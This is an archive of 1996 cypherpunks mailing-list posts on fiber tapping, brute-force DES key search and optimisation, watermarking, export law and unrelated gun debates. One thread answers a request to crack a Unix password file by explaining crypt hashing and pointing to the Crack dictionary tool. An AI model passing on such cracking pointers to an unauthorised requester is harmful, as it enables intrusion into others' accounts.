To: "Douglas R. Floyd" <harka@nycmetro.com
Subject: Re: Bare fibers
Message-ID: <199607231854.LAA28025@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:30 AM 7/23/96 -0500, Douglas R. Floyd wrote:
>> 
>>  * Carbons sent to: In: jimbell@pacifier.com
>> 
>>  -=> Quoting In:jimbell@pacifier.com to Harka <=-
>> 
>>  In> The fiber is usually  coated with a very thin layer of clear plastic to
>>  In> protect against moisture  and abrasion, and the diameter  is around 0.5
>>  In> to 1.0 millimeters in diameter.   
>> 
>> 
>> Doesn't that make it vulnerable (detectable) to Tempest attacks?
>
>Not really sure how.  I have had heard of ways to tap a fibre optic link
>noninvasively, but its not related to Van Eck or anything like that.

You could break the fiber and add a repeater (if you know enough about the
light protocol).  Plastic fiber can be cut with a pocket knife, glass
requires a machine which will make a square cut and polish the end.  Those
machines are not yet cheap.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 24 Jul 1996 10:29:14 +0800
To: Hallam-Baker <cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <199607231854.LAA28030@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:10 PM 7/22/96 -0400, Hallam-Baker wrote:
>If you apply genetic programming techniques to the system the strategy
>that evolves is typically a cooperative one. The facts is that the
>theory applied in an evolutionary context disproves Perry.

I don't understand this conclusion.  One book people aside, it is generally
believed that humans evolved in an evolutionary context and they certainly
frequently use cooperative strategies.  Cooperation usually also involves
the ability to sanction misbehavior.  Unilateral disarmament is throwing
away your sanction.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 24 Jul 1996 08:00:05 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: Brute Force DES
Message-ID: <199607231854.LAA28036@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:41 AM 7/23/96 -0800, jim bell wrote:
>Not that I think that such a dedicated chip necessarily exists; chances are 
>good that there isn't all that much demand for a 12-megabyte/second 
>encryptor.

If you are running a 600 megabit/sec ATM/SONET link and want to encrypt it,
you are in the market for a 75 megabyte/sec encryptor.

As for dedicated crackers, according to my notes from the SAFE forum at
Stanford, Eric Thompson said his company made FPGAs for cracking DES.  A
seven day crack for $1 million.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alex F" <alexf@iss.net>
Date: Wed, 24 Jul 1996 08:27:28 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Watermarks (slightly off-topic?)
Message-ID: <199607231559.LAA04919@phoenix.iss.net>
MIME-Version: 1.0
Content-Type: text/plain



> In list.cypherpunks you write:
> 

> Tough to do.  A CD samples at 44,100 Hz.  Nyquist says you can only
> resolve the original frequencies up to 1/2 the sampling rate.  So a CD
> cuts off, of necessity, at 22,050 Hz.  Many people can hear beyond 22
> KHz, and can notice the CD cutoff effect.  (analog recordings taper off
> as the analog response diminishes)  Not a lot of room inband.

Actually (speaking from personal experience) many many recordings are 
now done at a sampling rate of 48 instead of 44.1 (actually it may be 
around 50/50 or so, from my experience).  Many CD replicators these 
days are thrilled to get recordings done at 48 instead of 44.1, which 
gives even more room.

Another possibility, if you want to get even more into detail is to 
encode the ID in digital format on the CD.  This will give an audible 
sound (ever put a CD-Rom in a regular CD player by mistake?), but a 
mirror of that sound played at the same time will effectively set 
that sound to nothing (cancelling it out).  You can't hear it, but a 
machine can still decode the digital info.  This way you can set it 
at a higher frequency where if it happens to cancell out a brief 
second of music, the listener won't notice (unless you are "Jamie 
Summers" :)  ).



Alex F
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F    alexf@iss.net
Marketing Specialist
Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 23 Jul 1996 13:50:44 +0800
To: cypherpunks@toad.com
Subject: Re: Special Agent Safdar
Message-ID: <ae197f88100210046989@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I hadn't planned to comment, but I've seen messages like this one, and a
message from Perry, which appear to take "Anonymous" seriously, or at least
to take him as sending his message as a serious attack. I took it as a
broad satire, though lacking in the craziness which usually signals to all
that a satire or spoof (or facetiousness, depending on one's ideas about
irony) is involved.


At 7:33 PM 7/22/96, Alan Olsen wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>At 02:32 AM 7/22/96 -0600, Anonymous wrote:
>>FBI Special Agent Safdar is upset enough by the revelation
>>of his true identity to issue a quick denial (on a sunday night, to get
>>more OT no doubt), but he doesn't even bother to try to refute the
>>central truth that his cover has been blown by a careless operator at
>>his home office who verified his employment and offered to take a message
>>for him.
>
>Denial?? Sarcasm perhaps...  No "denial" I could see.

Alan, I'm somewhat surprised that you could mention "sarcasm" without
thinking--as I did less than a fourth of the way through the "Anonymous"
piece you are quoting--that the whole piece was a close relative of
sarcasm. That is, a spoof, a satire, a joke. I think the first mention of
VTW being an agent of the Gubment might have been serious, albeit clueless.
But this later piece has all the hallmarks of an over-the-top satire on the
first "Safdar is an agent" piece.

Consider some "tells":

>>We don't have to wonder a second longer about the motives behind

"We don't have to wonder a second longer..." Pretty clearly over the top.

>Why would they have to operate a dummy organization?  All they have to do is
>get the names of the subscribers on this list.  Much more cost effective.

Indeed. Which is why the first piece is so obviously satirical.

>>We must call on the other organizations, like EPIC, EFF, CDT, and ACLU
>>to denounce the VTW\FBI fraud. Their board of directories, Blaze and
>>Schneier to face the truth in public that they they have been used.
>>The net as a whole to demand its pound of cyberflesh.

Further, we must insist that Diffie confess to his role in undermining the
only truly secure cryptosystem, the virtual one-time pad! By propagating
his filth about the strength of public key systems, aided by his
VTW-Tchurka agent Schneier, he has polluted our precious bodily fluids.

>And not to forget all the free code that Blaze and Schneier have handed out
>over the years.  Maybe that is a plot as well.  Maybe the typos in Applied
>Cryptography are a secret conspiracy to weaken the cryptography of the
>nation.  Next thing I expect you to say is that Queen Elisabeth is a drug
>dealer and/or other LaRouche style rants.

The House of Windsor is controlled by the psy-ops Tavistock Insitute, also
known as the White Visitation. Freud, a cocaine and morphine user, advised
Tavistock on psy-ops and the British opium trade. Esalen, a Tavistock-CIA
think tank and training center, has hosted several international meetings
of the Drug Cartel, including both the Cali Cartel and the notorious
Langley Cartel.

(Besides, doesn't the entire British Royal Family behave as if they're on
drugs? 'Nuff said.)

>>There are very big questions to be answered now and we must not
>>forget to keep asking them until they have been. How high did
>>this operation go? Agent Safdar is no Olly North! He didn't
>>do this on his own. Who ordered this?
>
>The voices in your head?  Actually, I have more interest in your motives
>than his.

Read up on the uses of this kind of humor.


>Your accusations are not accomplishing anything constructive.  I do not
>believe that they were designed to either.  I believe that they were
>designed to sow mistrust in the individuals who are making real progress
>against the Government held position that they have the right to spy on our
>every move.

But who would take the points seriously, besides you, Perry, and one or two
others? I just read it, and thought: "Mildly funny, but not quite crazed
enough."


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 23 Jul 1996 16:44:00 +0800
To: cypherpunks@toad.com
Subject: Re: No more stupid gun thread ...
Message-ID: <ae1986b1110210041802@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:24 AM 7/23/96, Ernest Hua wrote:
>Ok.  This thread has gone on long enough and covered just about every
>point except the one which I originally made in my first response,
>which is that I abhor the idea that kids should carry weapons (of any
>sort) to school as standard equipment.  In fact, I abhor the idea
>that kids should carry weapons at school for any reason.
>
>Enough said.
>
>I do not care to discuss:
>
>1.  Should kids have any weapons at any time?
>
>2.  Should kids have guns (specifically guns)?
>
>3.  Should kids know how to operate weapons of any sort?

Fine, Ernest, then don't discuss these issues!

I don't recall _anyone_ arguing the case for kids carrying guns to school.
Several people commented on the training they received as children, the
training they have given their own children, and their general views.
Nothing about giving little 8-year-old Suzie an Uzi to carry to her
3rd-grade class.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 24 Jul 1996 10:54:40 +0800
To: Jerome Tan <jti@i-manila.com.ph>
Subject: Re: Decrypt Unix Password File
In-Reply-To: <01BB78C7.358738E0@ip73.i-manila.com.ph>
Message-ID: <Pine.LNX.3.94.960723121315.230B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 23 Jul 1996, Jerome Tan wrote:

> How can I decrypt Unix password file?

You can't decrypt a password file.  The password is hashed by using the
password as a DES key, and encrypting a string of 8 NULs 25 times.  The
E-tables of the DES algorithm are permutated according to the twelve-bit salt
which is encoded in the first two characters of the hashed password field.
The E-tables are permutated by swapping the entries N and N+24 if the Nth bit
of the salt value is 1.  A salt value of 0 will result in straight DES being
used 25 times.  This is the only salt value that can't be used in the UNIX
password file.

A program like Crack will use a dictionary attack to crack a password file.
It's available at ftp://ftp.funet.fi/pub/security.

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMfT77bZc+sv5siulAQGPpwP/R93/3Z4o14CYeYNZOBa0kK7tArcDAP12
bWG1pw0pW0FZDbWg12LOz8xZbvAiSe88sNQhuzs8b8GwS71yzhGDwCMRFGjIealE
xiUch7b6qnE9w9H7gV80nxcVTS/sRzEqYxjhT8JRU9YalS5CvzVo1ciTSj28xDs7
e62HYbBpTKI=
=E0Wh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 24 Jul 1996 12:31:21 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Flaws of Thinkers (Jefferson, Rand, Nietzsche, Voltaire, etc.)
In-Reply-To: <ae196a340e02100466af@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960723122028.8943E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Did Ayn Rand have any good sexual peccedillos?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 23 Jul 1996 16:08:33 +0800
To: cypherpunks@toad.com
Subject: Re: Bare fibers
Message-ID: <ae19882f1202100471bc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:21 PM 7/22/96, harka@nycmetro.com wrote:
> * Carbons sent to: In: jimbell@pacifier.com

(Nice pun, unless it was unintentional or automatic...but, then, we're
Cypherpuns, and these "threads" inspire them.)

> -=> Quoting In:jimbell@pacifier.com to Harka <=-
>
> In> The fiber is usually  coated with a very thin layer of clear plastic to
> In> protect against moisture  and abrasion, and the diameter  is around 0.5
> In> to 1.0 millimeters in diameter.
>
>
>Doesn't that make it vulnerable (detectable) to Tempest attacks?
>

No, TEMPEST has nothing whatsover to do with this. You can learn what
TEMPEST is by doing a Web search on the term, or by reading about it
elsewhere.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 24 Jul 1996 19:54:34 +0800
To: trei@process.com
Subject: Re: DES Optimization (Brute Force DES)
Message-ID: <199607231617.JAA19247@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> "Peter Trei" writes:
> > The fastest general purpose, freely available des implementation I'm
> > aware of is libdes. by Eric Young. With this, I can do a set_key in 
> > 15.8 us, and an ecb_encrypt in 95 us/block. That adds up to 
> > about 9,000 keytests/sec (this is on a 90 MHz P5, running NT).
> 
> I'll point out that like most DES implementations, Eric's tries to
> spend a lot of time in key setup to save time later on in
> encryption/decryption. This tradeoff would probably be very different
> if you didn't plan on trying more than one or two blocks of decryption
> after getting a key.
> 
> Perry

Yep - with good optimization, the keygen and the des rounds get very close
to each other in processing cost. Let's look at the steps involved (I'm refering
to the DES description in Schneier, 2nd ed, p 270-278). I've not yet coded these
optimizations, so this may be subject to revision.

I'm assuming a known plaintext attack on a single 64 bit block, ECB mode.
What we want to obtain is the key (which was presumably also used to encode
interesting data which we can't read)

First of all, we can move the initial and final permutes (tables 12.1 and 12.8)
completely out of the testing loop. These have to done only once per run, and
thus are effectively zero cost.

Similarly, we can eliminate the key permutation (table 12.2), and iterate the 
permuted 56 bit key. If we get at hit, we invert the key permutation and add 
back the parity bits to get the original key.

In the DES round The S-box and P-box steps can be combined into a single 
48->32 bit permutation.

So, per round (there are 16), we now have:

1. copy 32 bit sub-block to use as 'other' half in next round.
2. expansion permutation  (32 -> 48)
3. xor with appropriate subkey.
4. perform the s-p permutation. (48->32)
5. xor with 'other' half from previous round.

The key scheduling can be done in parallel with the rounds, since we're only planning on
using each key once. However, on the Pentium it may be more efficient to do it before the des 
rounds,  due to register starvation. 

Generating the subkeys is actually quite painful. You have to rotate the 56 bit key as 
two 28 bit halves, by one or two bits depending on the round, and then do a 56-> 48 bit
permutation to generate the subkey. This step needs to be done 16 times.

In a regular DES implementation,  you generate the key schedules once at the start, and 
reuse them for each block, so there is little to be gained by optimzing this step. In a 
keysearch situation it's a different matter.

Optimizing the permutations:

DES was originally designed for hardware implementation, where permutation is a simple 
matter of braiding the wires between the input and output. It's a lot harder in software. 
I'm aware of two basic approaches:

1. Algorithmic: Analyse the permutation table to find bits which get shifted in the same direction, 
by the same number of bits, and arrange a series of SHIFTs, ANDs, and ORs to generate
the desired permutation. This is essentially a geometry problem.

2. Lookup: Create tables for the permutation. While a permutation with n bits of input 
requires 2^n entries (each the size of the output data) if done as a single table, it's
possible to break the permutation into several smaller tables, at increased processing 
time. 

This is a classic speed vs space tradeoff, with a big step if your tables are too
large to fit into cache (and even bigger if they go to virtual memory)

Example: A straight 32 -> 32 bit permutation:

If done as one table, it would have 2^32 entries, and take about 16 Gbytes.

If broken up into 4 tables, each of which dealt with 8 bits of the input, it would
take 4096 bytes total. However, the calculation would require extracting the four
eight bit subkeys from the input, doing four lookups, and ORing the four results
together to get the final output.

A 32 bit perm could also be done with two tables, but they would occupy half a Mb.

The S-P step and the compression step of the key schedule are probably  faster
by lookup than by algorithm. I'm not sure about the expansion permutation, which 
is very regular. 

The size and number of tables used is going to depend a lot on cache size and 
available memory - for example, the rotates in the key scheduling can be eliminated
if I'm willing to maintain 16 key compression tables (one for each round).

I strongly expect that the whole key testing loop can fit into the 8k L1 code cache.
The lookup tables *may* fit into the L2 cache.

If anyone has any other optimizations, I'd like to hear about them.

Peter Trei
trei@process.ocm 

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 23 Jul 1996 14:04:02 +0800
To: cypherpunks@toad.com
Subject: Was Jefferson a Better Cryptographer or Slaveowner?
Message-ID: <ae198a8413021004fe17@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:03 PM 7/22/96, Simon Spero wrote:
>On Mon, 22 Jul 1996, Perry E. Metzger wrote:
>> (BTW, Jefferson's slaves were inherited and an an entailment clause in
>> the will prevented him from freeing them during his lifetime. Not, of
>
>It would be hard to prove the case that this was the only thing
>preventing earlier manumission, but then the whole issue is one of the
>hardest things to understand about Jefferson; many of his closest friends
>were leaders in the abolitionist movement of the time, and it's almost
>impossible to believe that he didn't know slavery to be morally
>indefensible relatively early on in his political development. Guess it
>was just part of his programming he couldn't throw off.
>
>Still leaves him just ahead of FDR as best american president, but does
>drop him a way behind Paine for best  political theorist of the revolution

I agree that Jefferson was the best President. Thinker, writer, inventor,
cryptographer, teacher, farmer, founder of universities, and principal
author of the Declaration of Independence of course.

Yes, he owned slaves. Makes me rethink my position on slave-owning....

--Tim "Massa" May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 24 Jul 1996 09:29:50 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: No more stupid gun thread ...
In-Reply-To: <ae1986b1110210041802@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960723123205.8943H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


How _can_ anyone say that "stupid guns" is ready for the trash-heap of 
history?   No one has called anyone a Nazi yet!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 24 Jul 1996 19:03:33 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Boycotts and Etiquette
In-Reply-To: <v03007808ae1a05e84034@[192.187.162.15]>
Message-ID: <Pine.SV4.3.91.960723123656.8943J-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I never said thta I don't intend to _read and consider_ anyon'e posts. I 
said that I don't intend to dispute them.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Wed, 24 Jul 1996 10:50:50 +0800
To: cypherpunks@toad.com
Subject: Re: NSA Lawyers Believe ITARs Would be Overturned if Tested in Court (fwd)
In-Reply-To: <Pine.LNX.3.91.960722195946.22354A-100000@offshore>
Message-ID: <Pine.LNX.3.91.960722201230.22378A-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain




My arms trafficker page has been up since April 26th. We have 838 arms
traffickers and a public file with a list of 360 "known arms traffickers". 
It was mentioned on CNN. So far, nobody from the NSA or anywhere else has
complained. 

I am sure if this went to court they would loose.  They have to claim that
clicking a mouse button on a web form so that 3 lines of text go back to
where they just came from, makes someone a criminal. "May it please the
court, the charge against these 838 criminal clickers is international
arms-trafficking."  In a country where a double murderer can walk? 

I am sure they realize this, which is why I feel it is safe for me to do
this (also I believe that EFF etc would so love to have my case as a test
case that they would pay my legal bills). 

  --  Vince Cate

    http://online.offshore.com.ai/arms-trafficker/
    http://online.offshore.com.ai/publicity/cnn.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 23 Jul 1996 14:04:49 +0800
To: cypherpunks@toad.com
Subject: Boobytraps and the American Legal System
Message-ID: <ae198c8e1402100478ac@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:36 PM 7/22/96, Vinnie Moscaritolo wrote:
>>   You pop a claymore in a building with any substance up to the level of
>>concrete re-enforced, and you _will_ be going with them.
>
>booby traping your home is a really stupid idea, I promise that your
>dog/child/spouse will be theone to accidentally set it off. besides for
>this you can get sued..
>
>every hear the one about the case of a guy who constantly had his radar
>detector stolen out his his car, he decides to set a trap and rigs his next
>one with exposive. The perp steals the box, sells it. someclown powers it
>up on his dash board and BANG!.. well you'd figure justice is served, but
>the NYC judges awarded the mass of flesh damages and charged the guy with
>manslaughter.

Agree, very foolish to ever plant boobytraps in one's own home.

Still, I remember vividly in college when the court case was decided
involving a guy in Florida who was tired of being burglarized and the cops
doing nothing about it: he rigged a shotgun to go off when someone broke a
window and entered. A perp did, was shot, survived, and the case went to
trial.

The boobytrapper was found guilty of some serious crime--I don't recall the
details (this was circa 1972).

However, all of my dorm roommates at the time were chortling over the
stupidity of imprisoning someone for the crime of trying to defend his
property against repeated invasions by scum. This was a "touchstone"
example for most of us, raised on Heinlein and Rand as we were. More than
chortling, we were uniformly angry. (The world seems to be divided into two
basic types over issues like this: those who  are outraged that the burglar
could collect damages from his victim, and those who are outraged that the
owner was even able to buy a shotgun in the first place.)

(Later examples were to be even worse. For example, the burglar who climbed
on a roof and stepped through a skylight. He sued, and won. I guess the
owner of the property was obligated to install night lights so burglars
could see their way, and to generally make his property more
"burglar-friendly." Or the woman who sued a hospital, claiming her psychic
abilities were lost after a CAT scan. She won.)

As Vinnie said, "only in Amerika."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bill Olson (EDP)" <a-billol@microsoft.com>
Date: Wed, 24 Jul 1996 14:25:16 +0800
To: "'perry@piermont.com>
Subject: RE: [Noise] was Re: Giving 6 year old kids Uzi's
Message-ID: <c=US%a=_%p=msft%l=RED-16-MSG-960723195445Z-36326@abash1.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger writes:
>
>
>"Bill Olson (EDP)" writes:
>> I don't care if it takes my son 6 years to get through 2 grade levels,
>> anyone who allows there kid to pack a gun (or a rifle?) should get their
>> head examined
>
>Why? What, objectively, is wrong with allowing, say, a twelve year old
>to go plinking with a .22? Lets not hear vitriol -- lets just hear
>cold hard reasons not to allow it.
>
>Myself, I'd say that it appears that there is no good objective
>reason.
>
>Perry

I find nothing wrong with plinking. Hell, I'm from Montana--we used to
go shooting all the time. But when the shooting was done, the guns were
put away. What I find disturbing is that a child is taking it to school,
or just carrying it around. I say that any parent who thinks their child
is mature enough to carry a gun for non-recreational reasons is less
mature than the child. In fact, I'd go so far as to say they are a
danger to their own children.

I guess I don't really have to worry too much, though. It is illegal for
children to possess such items publicly, and any parent who condones it
is simply breaking the law. I don't blame the child, I blame the moronic
parent who let's it happen.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 24 Jul 1996 13:30:50 +0800
To: cypherpunks@toad.com
Subject: M$NBC covers "Fear of a Hack Planet" and "Hate Goes Online"
Message-ID: <Pine.GUL.3.94.960723125147.15654F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At the risk of giving M$NBC more attention than it deserves...

BillG's latest misadventure editorializes on free/hate speech tonight at 7
and 10pm. Current and past fluffage at http://www.thesite.com/cgi/worl.cgi

There's also a blank message area for "Would you bank through your computer?
Do you think the technology is secure enough?" but no story. Maybe that's
tomorrow.

- -rich
 http://www.c2.org/~rich/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMfUvjpNcNyVVy0jxAQF9pgH/cYKc2FlkNt9xD1MFXHnMg9tshZsVqKjW
O7ZYEyDOxutgBTgNoDkW2VA1FqkKioqxDGjurvUJmuvRGBu3E2GOfA==
=bFqb
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 24 Jul 1996 15:47:41 +0800
To: cypherpunks@toad.com
Subject: Re: DES-Busting Screen Savers?
In-Reply-To: <ae1a5e6f1d021004c7bc@[205.199.118.202]>
Message-ID: <199607232002.NAA21336@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

 > -- Thus, the calculation will have to go 2-4 times longer
 > to give a high (>95%) chance that the answer is found. For
 > example, at 3 times the "efficient" search time, there is
 > only a 1/e^3 = 5% chance that nobody has found the answer

 > The probabalistic assignment is less efficient, obviously,
 > but has the advantage of not requiring a registry of
 > keyspace allocations. Further, "denial of service" attacks
 > (lying about having searched a chunk, or incorrectly
 > searching or reporting) are not a problem.

This is definitely the way to go when trying to break a block
cipher on the Net.  Partitioning out sieving works well for
distributed factoring only because verfying the submitted
relations requires a trivial amount of computer time compared
that expended in locating them.  There is no way for a central
server to verify a claim that a chunk of DES keyspace has been
thoroughly searched without a key being found, and it only takes
one bozo or saboteur to spoil the effort.

At triple the non-overlapping search time, we get about a 5%
chance of failure.  At quadruple, this falls to slightly less
than 2%.

Close enough for government work.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bill Olson (EDP)" <a-billol@microsoft.com>
Date: Wed, 24 Jul 1996 17:30:19 +0800
To: "'cypherpunks@toad.com>
Subject: RE: No more stupid gun thread ...
Message-ID: <c=US%a=_%p=msft%l=RED-16-MSG-960723200317Z-36356@abash1.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Ernest Hua writes:

>
>Ok.  This thread has gone on long enough and covered just about every
>point except the one which I originally made in my first response,
>which is that I abhor the idea that kids should carry weapons (of any
>sort) to school as standard equipment.  In fact, I abhor the idea
>that kids should carry weapons at school for any reason.
>
>Enough said.
>
>I do not care to discuss:
>
>1.  Should kids have any weapons at any time?
>
>2.  Should kids have guns (specifically guns)?
>
>3.  Should kids know how to operate weapons of any sort?
>
>If any of you really really have to discuss this issue, let's spare
>the rest of the list and send me E-Mail directly.
>
>Thanks!
>
>Ern


Who died and left you in charge?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 24 Jul 1996 07:15:01 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Ross Anderson's Eternity service
In-Reply-To: <199607230313.UAA18607@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.93.960723130327.1031A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 22 Jul 1996, Hal wrote:
> A few questions for discussion:
>  - Would there be much interest in it among users?

     I would be.

>  - Would it be a net benefit to society for such a service to exist?

     It would benefit people. It may harm society by doing so.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 24 Jul 1996 07:30:29 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Decrypt Unix Password File
In-Reply-To: <9HRiRD9w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.93.960723131530.1031B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jul 1996, Dr.Dimitri Vulis KOTM wrote:
> Jerome Tan <jti@i-manila.com.ph> writes:
> > How can I decrypt Unix password file?
> There are many programs that do this, e.g., look for 'crack'.
> This attack can be made more difficult if you force your users not to use
> easy-to-guess passwords, and if you use something like NIS and shadowing to
> make the public part of the passwords harder to get.

     From my conversations with Mr. Tan, he seems to be a high school 
bent of mischeif. He is the one who asked about penetating firewalls, 
and now wants to know how to hack a unix passwd file. 

     Now, I am not philosophically opposed to hacking, unless you are doing
it to a machine that I am responsible for, (in which case you'd better hope
the FBI finds you before I do) but I don't think that it would be a good 
idea to just give him the information. He would wind up getting caught all 
too easily, and might point to this list as a source of information on 
cracking techniques. 

     I don't know if this should go to the whole list, so you can 
bounce it there if you think it proper.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Wed, 24 Jul 1996 06:54:22 +0800
To: David Sternlight <cypherpunks@toad.com
